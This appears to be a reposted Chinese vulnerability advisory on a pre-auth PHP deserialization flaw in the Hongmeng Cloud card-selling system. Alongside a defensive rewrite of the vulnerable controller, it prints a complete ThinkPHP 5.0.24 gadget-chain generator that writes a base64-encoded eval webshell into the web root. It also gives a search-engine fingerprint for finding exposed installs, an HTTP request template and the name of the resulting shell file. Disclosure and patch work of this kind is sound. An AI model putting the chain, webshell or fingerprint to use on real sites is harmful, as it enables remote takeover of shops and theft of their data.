红盟云发卡系统 (Hongmeng Cloud card-selling system) has a deserialization RCE vulnerability

admin, 10 July 2024 18:32:19
Vulnerability Overview

红盟云卡系统 (Hongmeng Cloud Card System) is a high-performance, stable online virtual-goods sales system built on the ThinkPHP framework. It supports multi-specification products, WeChat order push notifications, configurable commissions and agent levels, and sub-sites.

Asset Details

Fofa: "/assets/shop/dist/uaredirect.js?v=1.2.0"

Vulnerability Analysis


In /application/shop/controller/Order.php the orderContent() action calls unserialize() on a parameter that the client fully controls, and the bundled ThinkPHP framework contains a usable gadget chain, so a front-end (pre-auth) deserialization vulnerability results.

```php
public function orderContent($order_no){
  $user = Hm::getUser();
  if($this->request->param('search_content')){
    $search_content = unserialize(base64_decode(urldecode($this->request->param('search_content'))));
    if(isset($search_content['order_no'])){
      $where = [
        'order_no' => $search_content['order_no']
        ];
    }else{
      $where = [
        'account' => $search_content['account'],
        'password' => $search_content['password'],
        'order_no' => $order_no
        ];
    }
    // ... the rest of the method is not included in the original excerpt
```
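The root cause is the unserialize() call on base64-decoded client input. As an added illustration (this is not the vendor's code or patch), the following is how the lookup in orderContent() can be rebuilt so that no client-supplied bytes ever reach unserialize(). It assumes the ThinkPHP 5 `think\Controller` base class, the `trace()` and `$this->error()` framework helpers, and the project's `Hm::getUser()` helper exactly as they appear in the excerpt; the client is assumed to send `search_content` as base64(JSON) instead of base64(serialize(...)). The legacy decoder is included only for deployments that cannot change the client format yet.

```php
<?php
// Added example, not the project's code: hardened search_content handling
// for orderContent(). Assumptions: ThinkPHP 5 Controller, trace(), error(),
// and the project's Hm::getUser() helper imported as in the original file.
namespace app\shop\controller;

use think\Controller;

class Order extends Controller
{
    // Only these keys are accepted from the client; everything else is dropped.
    const ALLOWED_KEYS = ['order_no', 'account', 'password'];

    public function orderContent($order_no)
    {
        $user  = Hm::getUser();            // project helper (assumed import)
        $raw   = $this->request->param('search_content');
        $where = ['order_no' => $order_no];

        if ($raw !== null && $raw !== '') {
            $search = self::decodeSearchContent($raw);
            if ($search === null) {
                // Malformed input, including anything shaped like a PHP
                // serialized object: record it for the SOC and stop here.
                trace('orderContent: rejected search_content payload', 'warn');
                return $this->error('invalid search parameters');
            }
            if (isset($search['order_no'])) {
                $where = ['order_no' => $search['order_no']];
            } elseif (isset($search['account'], $search['password'])) {
                $where = [
                    'account'  => $search['account'],
                    'password' => $search['password'],
                    'order_no' => $order_no,
                ];
            }
        }
        // ... query and rendering continue as in the original method
    }

    /**
     * Decode search_content without unserialize(): strict base64, a size
     * cap, a JSON document, and a whitelist of scalar keys. Returns the
     * filtered array or null when the input is not acceptable.
     */
    public static function decodeSearchContent($raw)
    {
        $decoded = base64_decode($raw, true);          // strict: reject non-base64
        if ($decoded === false || strlen($decoded) > 1024) {
            return null;
        }
        // Defence in depth: refuse data that looks like PHP serialization
        // (O:, C:, a: prefixes) even though it would never be unserialized here.
        if (preg_match('/^[OCa]:\d+:/', $decoded)) {
            return null;
        }
        $data = json_decode($decoded, true);
        if (!is_array($data)) {
            return null;
        }
        return self::filterKeys($data);
    }

    /**
     * Minimal-change alternative for clients that still send serialized
     * arrays: allowed_classes=false turns every object into
     * __PHP_Incomplete_Class, so no gadget __wakeup/__destruct can run.
     */
    public static function decodeLegacySearchContent($raw)
    {
        $decoded = base64_decode($raw, true);
        if ($decoded === false || strlen($decoded) > 1024) {
            return null;
        }
        $data = @unserialize($decoded, ['allowed_classes' => false]);
        if (!is_array($data)) {
            return null;
        }
        return self::filterKeys($data);
    }

    // Keep only whitelisted keys whose values are scalars, cast to string.
    private static function filterKeys(array $data)
    {
        $clean = [];
        foreach (self::ALLOWED_KEYS as $key) {
            if (isset($data[$key]) && is_scalar($data[$key])) {
                $clean[$key] = (string) $data[$key];
            }
        }
        return $clean ?: null;
    }
}
```

The JSON path is the real fix: the class of bug disappears entirely once user input is never passed to unserialize(). The `allowed_classes => false` variant blocks this gadget chain (objects come back as `__PHP_Incomplete_Class`, whose magic methods are never invoked) and is a one-line change to the existing code, but it still leaves an unserialize() call on untrusted input and should be treated as a stopgap. The rejected-payload trace line gives detection engineering a concrete event to alert on.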

ThinkPHP 5.0.24 POP chain:

```php
<?php
namespace think\process\pipes {
    class Windows {
        private $files = [];
        public function __construct($files){
            $this->files = [$files]; // $files => a subclass of think\Model, new Pivot(); Model itself is abstract
        }
    }
}
namespace think {
    abstract class Model{
        protected $append = [];
        protected $error = null;
        public $parent;
        function __construct($output, $modelRelation){
            $this->parent = $output;                  // $this->parent => think\console\Output
            $this->append = array("xxx"=>"getError"); // calls getError(), which returns $this->error
            $this->error = $modelRelation;            // $this->error must be a subclass of Relation that is also a subclass of OneToOne ==> HasOne
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
        function __construct($output, $modelRelation){
            parent::__construct($output, $modelRelation);
        }
    }
}
namespace think\model\relation{
    class HasOne extends OneToOne {
    }
}
namespace think\model\relation {
    abstract class OneToOne
    {
        protected $selfRelation;
        protected $bindAttr = [];
        protected $query;
        function __construct($query){
            $this->selfRelation = 0;
            $this->query = $query;     // $query points to Query
            $this->bindAttr = ['xxx']; // the $value passed as the second argument of the call() invocation
        }
    }
}
namespace think\db {
    class Query {
        protected $model;
        function __construct($model){
            $this->model = $model; // $this->model => think\console\Output
        }
    }
}
namespace think\console{
    class Output{
        private $handle;
        protected $styles;
        function __construct($handle){
            $this->styles = ['getAttr'];
            $this->handle = $handle; // $handle -> think\session\driver\Memcached
        }
    }
}
namespace think\session\driver {
    class Memcached
    {
        protected $handler;
        function __construct($handle){
            $this->handler = $handle; // $handle -> think\cache\driver\File
        }
    }
}
namespace think\cache\driver {
    class File {
        protected $options=null;
        protected $tag;
        function __construct(){
            $this->options=[
                'expire' => 3600,
                'cache_subdir' => false,
                'prefix' => '',
                'path'  => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
                'data_compress' => false,
            ];
            $this->tag = 'xxx';
        }
    }
}
namespace {
    $Memcached = new think\session\driver\Memcached(new think\cache\driver\File());
    $Output = new think\console\Output($Memcached);
    $model = new think\db\Query($Output);
    $HasOne = new think\model\relation\HasOne($model);
    $window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne));
    echo serialize($window);
    echo base64_encode(serialize($window));
}
```
Vulnerability Reproduction


Payload (works on both Windows and Linux):

```http
POST /shop/order/orderContent?order_no=123 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 1141
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:81
Origin: http://127.0.0.1:81
Referer: http://127.0.0.1:81/shop/order/orderContent?order_no=123
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

search_content=<payload omitted>
```


The written file is named in the format a.php + md5("tag_" . md5(xxx)) + .php, where xxx is the tag value assigned in the POP chain above.


Afterwards the following file is written into the public directory:

a.php12ac95f1498ce51d2d96a249c09c1998.php


Originally published by the WeChat public account 星悦安全: 红盟云发卡系统存在反序列化RCE漏洞

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site assumes no legal or joint liability. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Reposted from CN-SEC 中文网 (please keep this link when reposting, with thanks to the original author): https://cn-sec.com/archives/2939408.html